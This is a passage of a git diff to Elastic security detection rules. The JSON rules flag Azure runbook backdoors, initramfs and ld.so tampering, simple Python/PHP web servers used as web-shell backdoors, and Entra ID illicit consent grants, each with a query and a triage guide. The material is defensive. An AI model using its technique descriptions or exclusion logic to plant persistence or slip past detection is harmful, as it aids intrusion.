Azure Automation account, focusing on identifying any unauthorized access or changes made by adversaries.\n- Reset credentials and update access controls for the affected Azure Automation account to prevent further unauthorized access. Ensure that only authorized personnel have the necessary permissions to create or modify runbooks.\n- Implement additional monitoring and alerting for Azure Automation activities, specifically focusing on runbook creation and modification events, to enhance early detection of similar threats in the future.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or accounts have been compromised.\n- Document the incident, including all actions taken and findings, to improve response strategies and update incident response plans for future reference.", - "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\n (\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION\"\n ) and\n event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", - "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "16280f1e-57e6-4242-aa21-bb4d16f13b2f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "16280f1e-57e6-4242-aa21-bb4d16f13b2f_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16acac42-b2f9-4802-9290-d6c30914db6e_3.json b/packages/security_detection_engine/kibana/security_rule/16acac42-b2f9-4802-9290-d6c30914db6e_3.json index b592199b021..f6d190c9a04 100644 --- a/packages/security_detection_engine/kibana/security_rule/16acac42-b2f9-4802-9290-d6c30914db6e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/16acac42-b2f9-4802-9290-d6c30914db6e_3.json @@ -18,6 +18,13 @@ "https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteHosting.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 47, "rule_id": "16acac42-b2f9-4802-9290-d6c30914db6e", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/17b3fcd1-90fb-4f5d-858c-dc1d998fa368_2.json b/packages/security_detection_engine/kibana/security_rule/17b3fcd1-90fb-4f5d-858c-dc1d998fa368_2.json deleted file mode 100644 index aca2bdb0645..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/17b3fcd1-90fb-4f5d-858c-dc1d998fa368_2.json +++ /dev/null @@ -1,125 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the extraction of an initramfs image using the `cpio` command on Linux systems. The `cpio` command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.process*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*", - "logs-crowdstrike.fdr*", - "logs-sentinel_one_cloud_funnel.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Initramfs Extraction via CPIO", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Initramfs Extraction via CPIO\n\nInitramfs is a temporary filesystem used during the Linux boot process, containing essential drivers and scripts. Attackers may exploit the `cpio` command to extract and modify initramfs, embedding malicious files to ensure persistence. The detection rule identifies suspicious `cpio` usage by monitoring process execution patterns, excluding legitimate parent processes, to flag potential threats.\n\n### Possible investigation steps\n\n- Review the process execution details to confirm the presence of the cpio command with arguments \"-H\" or \"--format\" and \"newc\" to ensure the alert is not a false positive.\n- Investigate the parent process of the cpio command to determine if it is an unexpected or unauthorized process, as legitimate processes like mkinitramfs or dracut should be excluded.\n- Check the execution path of the parent process to verify if it matches any known legitimate paths such as \"/usr/share/initramfs-tools/*\" or \"/nix/store/*\".\n- Analyze the timeline of events around the cpio execution to identify any preceding or subsequent suspicious activities that might indicate a broader attack or persistence mechanism.\n- Examine the system for any unauthorized modifications or additions to the initramfs image that could indicate tampering or the presence of malicious files.\n- Correlate the alert with other security data sources like Elastic Endgame, Elastic Defend, or Crowdstrike to gather additional context and assess the scope of the potential threat.\n\n### False positive analysis\n\n- Legitimate system updates or maintenance activities may trigger the rule when tools like mkinitramfs or dracut are used. To handle this, ensure these processes are excluded by verifying that the parent process is mkinitramfs or dracut.\n- Custom scripts or automation tools that manage initramfs might use cpio in a non-malicious context. Review these scripts and add their parent process names or paths to the exclusion list if they are verified as safe.\n- Systems using non-standard initramfs management tools located in directories like /usr/share/initramfs-tools or /nix/store may cause false positives. Confirm these tools' legitimacy and update the exclusion paths accordingly.\n- Development or testing environments where initramfs is frequently modified for legitimate reasons can generate alerts. Consider creating environment-specific exceptions to reduce noise while maintaining security in production systems.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further unauthorized access or spread of potential malware.\n- Terminate any suspicious processes related to the `cpio` command that do not have legitimate parent processes, such as `mkinitramfs` or `dracut`.\n- Conduct a thorough review of the extracted initramfs contents to identify and remove any unauthorized or malicious files.\n- Restore the initramfs from a known good backup to ensure system integrity and remove any potential persistence mechanisms.\n- Monitor the system for any further suspicious activity, particularly related to the `cpio` command, to ensure the threat has been fully mitigated.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems may be affected.\n- Update security policies and procedures to include specific checks for unauthorized `cpio` usage and enhance detection capabilities for similar threats.", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\") and\nprocess.name == \"cpio\" and process.args in (\"-H\", \"--format\") and process.args == \"newc\" and not (\n process.parent.name in (\"mkinitramfs\", \"dracut\") or\n process.parent.executable like~ (\"/usr/share/initramfs-tools/*\", \"/nix/store/*\")\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "auditd_manager", - "version": "^1.0.0" - }, - { - "package": "crowdstrike", - "version": "^1.1.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.executable", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "17b3fcd1-90fb-4f5d-858c-dc1d998fa368", - "setup": "## Setup\nThis rule requires data coming in from Elastic Defend.\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1542", - "name": "Pre-OS Boot", - "reference": "https://attack.mitre.org/techniques/T1542/" - }, - { - "id": "T1543", - "name": "Create or Modify System Process", - "reference": "https://attack.mitre.org/techniques/T1543/" - }, - { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 2 - }, - "id": "17b3fcd1-90fb-4f5d-858c-dc1d998fa368_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/06d555e4-c8ce-4d90-90e1-ec7f66df5a6a_102.json b/packages/security_detection_engine/kibana/security_rule/183f3cd2-4cc6-44c0-917c-c5d29ecdcf74_5.json similarity index 50% rename from packages/security_detection_engine/kibana/security_rule/06d555e4-c8ce-4d90-90e1-ec7f66df5a6a_102.json rename to packages/security_detection_engine/kibana/security_rule/183f3cd2-4cc6-44c0-917c-c5d29ecdcf74_5.json index c663d88dcf8..40cf005519b 100644 --- a/packages/security_detection_engine/kibana/security_rule/06d555e4-c8ce-4d90-90e1-ec7f66df5a6a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/183f3cd2-4cc6-44c0-917c-c5d29ecdcf74_5.json @@ -3,37 +3,32 @@ "author": [ "Elastic" ], - "description": "This rule detects the creation of the dynamic linker (ld.so) file. The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code.", + "description": "This rule detects connections accepted by a simple HTTP web server in Python and PHP built-in modules. Adversaries may create simple HTTP web servers to establish persistence on a compromised system by uploading a reverse or command shell payload to the server web root, allowing them to regain remote access to the system if lost. This event may occur when an attacker requests the server to execute a command or script via a potential backdoor.", "from": "now-9m", "index": [ - "logs-endpoint.events.file*", - "logs-sentinel_one_cloud_funnel.*", - "endgame-*" + "logs-endpoint.events.process*", + "logs-endpoint.events.network*" ], "language": "eql", "license": "Elastic License v2", - "name": "Dynamic Linker (ld.so) Creation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Dynamic Linker (ld.so) Creation\n\nThe dynamic linker, ld.so, is crucial in Linux environments for loading shared libraries required by executables. Adversaries may exploit this by replacing it with a malicious version to execute unauthorized code, achieving persistence or evading defenses. The detection rule identifies suspicious creation of ld.so files, excluding benign processes, to flag potential threats.\n\n### Possible investigation steps\n\n- Review the process that triggered the alert by examining the process.executable field to understand which application attempted to create the ld.so file.\n- Check the process.name field to ensure the process is not one of the benign processes listed in the exclusion criteria, such as \"dockerd\", \"yum\", \"dnf\", \"microdnf\", or \"pacman\".\n- Investigate the file.path to confirm the location of the newly created ld.so file and verify if it matches any of the specified directories like \"/lib\", \"/lib64\", \"/usr/lib\", or \"/usr/lib64\".\n- Analyze the parent process of the suspicious executable to determine if it was initiated by a legitimate or potentially malicious source.\n- Look for any recent changes or anomalies in the system logs around the time of the file creation event to identify any related suspicious activities.\n- Cross-reference the event with other security tools or logs, such as Elastic Defend or SentinelOne, to gather additional context or corroborating evidence of malicious activity.\n- Assess the risk and impact of the event by considering the system's role and the potential consequences of a compromised dynamic linker on that system.\n\n### False positive analysis\n\n- Package managers like yum, dnf, microdnf, and pacman can trigger false positives when they update or install packages that involve the dynamic linker. These processes are already excluded in the rule, but ensure any custom package managers or scripts are also considered for exclusion.\n- Container management tools such as dockerd may create or modify ld.so files during container operations. If you use other container tools, consider adding them to the exclusion list to prevent false positives.\n- System updates or maintenance scripts that involve library updates might create ld.so files. Review these scripts and add them to the exclusion list if they are verified as non-threatening.\n- Custom administrative scripts or automation tools that interact with shared libraries could inadvertently trigger the rule. Identify these scripts and exclude them if they are part of regular, secure operations.\n- Development environments where ld.so files are frequently created or modified during testing and compilation processes may need specific exclusions for development tools or environments to avoid false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity and lateral movement.\n- Verify the integrity of the dynamic linker (ld.so) on the affected system by comparing it with a known good version from a trusted source or repository.\n- If the dynamic linker has been tampered with, replace it with the verified version and ensure all system binaries are intact.\n- Conduct a thorough scan of the system using updated antivirus or endpoint detection tools to identify and remove any additional malicious files or processes.\n- Review system logs and the process creation history to identify the source of the unauthorized ld.so creation and any associated malicious activity.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems are affected.\n- Implement additional monitoring and alerting for similar suspicious activities, such as unauthorized file creations in critical system directories, to enhance future detection capabilities.", - "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and process.executable != null and\nfile.path like~ (\"/lib/ld-linux*.so*\", \"/lib64/ld-linux*.so*\", \"/usr/lib/ld-linux*.so*\", \"/usr/lib64/ld-linux*.so*\") and\nnot process.name in (\"dockerd\", \"yum\", \"dnf\", \"microdnf\", \"pacman\")\n", + "name": "Simple HTTP Web Server Connection", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Simple HTTP Web Server Connection\n\nSimple HTTP servers in Python and PHP are often used for development and testing, providing a quick way to serve web content. However, attackers can exploit these servers to maintain access on compromised Linux systems by deploying backdoors or executing commands remotely. The detection rule identifies suspicious server activity by monitoring for specific process patterns and command-line arguments indicative of these lightweight servers, flagging potential misuse for further investigation.\n\n### Possible investigation steps\n\n- Review the process details, including the process name and command line arguments, to confirm if the server was started using Python or PHP, as indicated by the query fields.\n- Check the network connection details associated with the event, such as the source and destination IP addresses and ports, to identify any suspicious or unexpected connections.\n- Investigate the user account under which the process was initiated to determine if it aligns with expected behavior or if it indicates potential unauthorized access.\n- Examine the system logs and any related events around the time of the alert to identify any additional suspicious activities or anomalies.\n- Assess the server's web root directory for any unauthorized files or scripts that could indicate a backdoor or malicious payload.\n- Correlate this event with other alerts or indicators of compromise on the system to evaluate if this is part of a larger attack campaign.\n\n### False positive analysis\n\n- Development and testing environments may frequently trigger this rule when developers use Python or PHP's built-in HTTP servers for legitimate purposes. To manage this, consider excluding specific user accounts or IP addresses associated with development activities from the rule.\n- Automated scripts or cron jobs that start simple HTTP servers for routine tasks can also generate false positives. Identify these scripts and add their process names or command-line patterns to an exception list.\n- Educational or training environments where students are learning web development might cause alerts. In such cases, exclude the network segments or user groups associated with these activities.\n- Internal tools or services that rely on lightweight HTTP servers for functionality might be flagged. Review these tools and whitelist their specific process names or command-line arguments to prevent unnecessary alerts.\n- Temporary testing servers spun up for short-term projects can be mistaken for malicious activity. Document these instances and apply temporary exceptions during the project duration.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration.\n- Terminate any suspicious Python or PHP processes identified by the detection rule to stop the potential backdoor or unauthorized server activity.\n- Conduct a thorough review of the system's file system, focusing on the web root directory, to identify and remove any unauthorized scripts or payloads that may have been uploaded.\n- Change all credentials associated with the compromised system, including SSH keys and passwords, to prevent attackers from regaining access.\n- Restore the system from a known good backup if any unauthorized changes or persistent threats are detected that cannot be easily remediated.\n- Implement network monitoring to detect any future unauthorized HTTP server activity, focusing on unusual process patterns and command-line arguments.\n- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other systems within the network.", + "query": "sequence by process.entity_id with maxspan=1m\n[process where host.os.type == \"linux\" and event.type == \"start\" and \n (\n (process.name regex~ \"\"\"php?[0-9]?\\.?[0-9]{0,2}\"\"\" and process.command_line like \"*-S*\") or\n (process.name like \"python*\" and process.command_line like (\"*--cgi*\", \"*CGIHTTPServer*\"))\n )]\n[network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_accepted\"]\n", "related_integrations": [ { "package": "endpoint", "version": "^8.2.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.0.0" } ], "required_fields": [ { "ecs": true, - "name": "event.type", + "name": "event.action", "type": "keyword" }, { "ecs": true, - "name": "file.path", + "name": "event.type", "type": "keyword" }, { @@ -43,7 +38,12 @@ }, { "ecs": true, - "name": "process.executable", + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.entity_id", "type": "keyword" }, { @@ -53,34 +53,39 @@ } ], "risk_score": 21, - "rule_id": "06d555e4-c8ce-4d90-90e1-ec7f66df5a6a", + "rule_id": "183f3cd2-4cc6-44c0-917c-c5d29ecdcf74", "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", "severity": "low", "tags": [ "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Command and Control", "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", "Resources: Investigation Guide" ], "threat": [ { "framework": "MITRE ATT&CK", "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" }, "technique": [ { - "id": "T1218", - "name": "System Binary Proxy Execution", - "reference": "https://attack.mitre.org/techniques/T1218/" + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] } ] }, @@ -109,30 +114,23 @@ { "framework": "MITRE ATT&CK", "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" }, "technique": [ { - "id": "T1574", - "name": "Hijack Execution Flow", - "reference": "https://attack.mitre.org/techniques/T1574/", - "subtechnique": [ - { - "id": "T1574.006", - "name": "Dynamic Linker Hijacking", - "reference": "https://attack.mitre.org/techniques/T1574/006/" - } - ] + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" } ] } ], "timestamp_override": "event.ingested", "type": "eql", - "version": 102 + "version": 5 }, - "id": "06d555e4-c8ce-4d90-90e1-ec7f66df5a6a_102", + "id": "183f3cd2-4cc6-44c0-917c-c5d29ecdcf74_5", "type": "security-rule" } \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_103.json b/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_103.json deleted file mode 100644 index 0c564995b8b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1a36cace-11a7-43a8-9a10-b497c5a02cd3_103.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment.", - "false_positives": [ - "Application credential additions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Application credential additions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Application Credential Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Application Credential Modification\n\nAzure applications use credentials like certificates or secret strings for identity verification during token requests. Adversaries may exploit this by adding unauthorized credentials, enabling persistent access or evading defenses. The detection rule monitors audit logs for successful updates to application credentials, flagging potential misuse by identifying unauthorized credential modifications.\n\n### Possible investigation steps\n\n- Review the Azure audit logs to identify the specific application that had its credentials updated, focusing on entries with the operation name \"Update application - Certificates and secrets management\" and a successful outcome.\n- Determine the identity of the user or service principal that performed the credential modification by examining the associated user or principal ID in the audit log entry.\n- Investigate the context of the credential modification by checking for any recent changes or unusual activities related to the application, such as modifications to permissions or roles.\n- Assess the legitimacy of the new credential by verifying if it aligns with expected operational procedures or if it was authorized by a known and trusted entity.\n- Check for any additional suspicious activities in the audit logs around the same timeframe, such as failed login attempts or other modifications to the application, to identify potential indicators of compromise.\n- Contact the application owner or relevant stakeholders to confirm whether the credential addition was expected and authorized, and gather any additional context or concerns they might have.\n\n### False positive analysis\n\n- Routine credential updates by authorized personnel can trigger alerts. Regularly review and document credential management activities to distinguish between legitimate and suspicious actions.\n- Automated processes or scripts that update application credentials as part of maintenance or deployment cycles may cause false positives. Identify and whitelist these processes to prevent unnecessary alerts.\n- Credential updates during application scaling or migration might be flagged. Coordinate with IT teams to schedule these activities and temporarily adjust monitoring thresholds or exclusions.\n- Third-party integrations that require periodic credential updates can be mistaken for unauthorized changes. Maintain an inventory of such integrations and establish baseline behaviors to filter out benign activities.\n- Frequent updates by specific service accounts could be part of normal operations. Monitor these accounts separately and consider creating exceptions for known, non-threatening patterns.\n\n### Response and remediation\n\n- Immediately revoke the unauthorized credentials by accessing the Azure portal and removing any suspicious certificates or secret strings associated with the affected application.\n- Conduct a thorough review of the application's access logs to identify any unauthorized access or actions performed using the compromised credentials.\n- Reset and update all legitimate credentials for the affected application to ensure no further unauthorized access can occur.\n- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized credential modification and any potential impact.\n- Implement additional monitoring on the affected application to detect any further unauthorized changes or access attempts.\n- Review and tighten access controls and permissions for managing application credentials to prevent unauthorized modifications in the future.\n- If necessary, escalate the incident to higher-level security management or external cybersecurity experts for further investigation and response.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Update application - Certificates and secrets management\" and event.outcome:(success or Success)\n", - "references": [ - "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "1a36cace-11a7-43a8-9a10-b497c5a02cd3", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1550", - "name": "Use Alternate Authentication Material", - "reference": "https://attack.mitre.org/techniques/T1550/", - "subtechnique": [ - { - "id": "T1550.001", - "name": "Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1550/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "1a36cace-11a7-43a8-9a10-b497c5a02cd3_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_215.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_215.json deleted file mode 100644 index 3a049725eab..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_215.json +++ /dev/null @@ -1,132 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources on-behalf-of the user.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "investigation_fields": { - "field_names": [ - "@timestamp", - "event.action", - "event.outcome", - "azure.auditlogs.properties.initiated_by.user.userPrincipalName", - "azure.auditlogs.properties.initiated_by.user.ipAddress", - "azure.auditlogs.properties.additional_details.value", - "azure.tenant_id", - "cloud.region", - "azure.auditlogs.properties.target_resources.0.display_name" - ] - }, - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft Entra ID Illicit Consent Grant via Registered Application", - "new_terms_fields": [ - "azure.auditlogs.properties.initiated_by.user.userPrincipalName", - "azure.auditlogs.properties.additional_details.value" - ], - "note": "## Triage and analysis\n\n### Investigating Microsoft Entra ID Illicit Consent Grant via Registered Application\n\nAdversaries may register a malicious application in Microsoft Entra ID and trick users into granting excessive permissions via OAuth consent. These applications can access sensitive data\u2014such as mail, profiles, or files\u2014on behalf of the user once consent is granted. This is commonly delivered via spearphishing links that prompt users to approve permissions for seemingly legitimate applications.\n\nThis rule identifies a new consent grant event based on Azure audit logs where the application was granted access with potentially risky scopes, such as offline_access, Mail.Read, or User.Read, and may include admin consent or tenant-wide delegation.\n\nThis is a New Terms rule that will only trigger if the user and client ID have not been seen doing this activity in the last 14 days.\n\n#### Possible investigation steps\n\n- Review `azure.auditlogs.properties.additional_details.value` to identify the AppId and User-Agent values to determine which application was granted access and how the request was initiated. Pivot on the AppId in the Azure portal under Enterprise Applications to investigate further.\n- Review `azure.auditlogs.properties.initiated_by.user.userPrincipalName` to identify the user who approved the application. Investigate their recent activity for signs of phishing, account compromise, or anomalous behavior during the timeframe of the consent.\n- Review `azure.auditlogs.properties.initiated_by.user.ipAddress` to assess the geographic source of the consent action. Unexpected locations or IP ranges may indicate adversary-controlled infrastructure.\n- Review `azure.auditlogs.properties.target_resources.display_name` to evaluate whether the application name is familiar, expected, or potentially spoofing a known service.\n- Review `azure.auditlogs.properties.target_resources.modified_properties.display_name` to inspect key indicators of elevated privilege or risk, including:\n - ConsentContext.IsAdminConsent to determine if the application was granted tenant-wide admin access.\n - ConsentContext.OnBehalfOfAll to identify whether the app was granted permissions on behalf of all users in the tenant.\n - ConsentAction.Permissions to evaluate the specific scopes and data access the application requested.\n - ConsentAction.Reason to understand if Microsoft flagged the activity or if any reason was recorded by the platform.\n - TargetId.ServicePrincipalNames to confirm the service principal associated with the granted permissions.\n- Review `azure.tenant_id` to confirm the activity originated from your tenant and is not related to a cross-tenant application.\n- Review `@timestamp` and `azure.auditlogs.properties.correlation_id` to pivot into related sign-in, token 